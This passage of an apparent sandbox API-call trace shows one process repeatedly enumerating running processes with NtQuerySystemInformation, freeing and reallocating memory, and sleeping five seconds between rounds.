returned 0x0 [0284.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.408] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 